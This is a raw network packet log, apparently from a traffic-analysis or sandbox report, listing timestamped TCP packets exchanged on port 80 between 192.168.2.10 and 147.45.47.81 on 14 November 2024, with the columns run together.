                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181787968 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181797028 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181798935 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181806087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181864023 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.181876898 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182215929 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182231903 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182246923 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182271004 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182296991 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182336092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182354927 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182364941 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182374001 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182383060 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182393074 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182403088 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182410002 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182425976 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182435036 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182436943 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182446957 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182457924 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182463884 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182467937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182482004 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182507992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182518959 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182528973 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182539940 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182550907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182585955 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182601929 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182601929 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182672977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182683945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182693005 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182740927 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182959080 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182970047 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182979107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.182991028 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.183001995 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.183027029 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.183110952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.183120966 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.183130980 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.183140039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.183150053 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.183159113 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.183167934 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.183203936 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.183343887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.183355093 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.183366060 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.183517933 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.199306965 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.199351072 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.199363947 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.199376106 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.199387074 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.199393988 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.199397087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.199438095 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.199438095 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.199980021 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.199990034 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.199999094 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.200009108 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.200061083 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.200069904 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.200103998 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.200103998 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.200103998 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.207918882 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.207932949 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.207942009 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.207966089 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.207997084 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.251602888 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.251646996 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.251657963 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.251667023 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.251694918 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.251715899 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.252876997 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.252912045 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.252923965 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.252944946 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.252954960 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.252964973 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.252974987 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.252975941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.252988100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.253006935 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.253016949 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.253043890 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.255083084 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.255196095 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.255207062 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.255219936 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.255331039 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.261579990 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.261593103 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.261605024 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.261615038 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.261626959 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.261636019 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.261698008 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.261698008 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.261698008 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.261709929 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.261723042 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.261775970 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.268748045 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.268789053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.268800020 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.268855095 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.268866062 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.268877029 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.268903971 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.268914938 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.268924952 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.268938065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.268975019 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.268975019 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.268975019 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.268996000 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269007921 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269021034 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269031048 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269031048 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269031048 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269042015 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269077063 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269084930 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269088984 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269092083 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269099951 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269112110 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269115925 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269124031 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269134045 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269144058 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269155025 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269179106 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269179106 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269179106 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269186974 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269198895 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269202948 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269211054 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269234896 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269247055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269257069 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269267082 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269295931 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269295931 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269334078 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269345999 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269355059 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269365072 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269388914 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269399881 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269417048 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269427061 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269437075 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269481897 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269481897 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269481897 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269481897 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269481897 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269575119 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269589901 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269606113 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269615889 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269627094 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269637108 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269684076 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269684076 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269684076 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269692898 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269707918 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269742966 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269758940 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269769907 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269779921 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269790888 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269800901 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269800901 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269804001 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269829988 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269857883 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269870043 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269875050 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269880056 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269881964 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269895077 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269931078 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269931078 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269964933 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269982100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.269993067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.270004034 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.270014048 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.270031929 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.270031929 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.270051003 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.270056009 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.270070076 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.270086050 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.270097017 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.270107031 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.270195961 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.270195961 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.281008005 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.281069994 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.281080961 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.281091928 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.281101942 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.281137943 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299159050 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299207926 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299222946 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299232006 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299273014 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299299002 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299323082 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299335003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299345016 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299355984 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299434900 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299434900 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299447060 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299458027 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299468040 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299479008 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299489975 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299503088 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299621105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299631119 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299640894 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299652100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299662113 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299699068 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299699068 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299720049 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299722910 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299731016 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299741030 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299751043 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299761057 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299770117 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299781084 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299781084 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299822092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299833059 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299854994 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299860954 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299874067 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299884081 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299930096 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299940109 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299949884 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299959898 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299972057 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.299985886 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.300020933 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.300052881 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.300064087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.300101042 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.300111055 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.300122023 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.300122976 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.300146103 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.300262928 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.300304890 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.301217079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.301271915 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.301282883 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.301321030 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:59.301327944 CET8049958147.45.47.81192.168.2.10
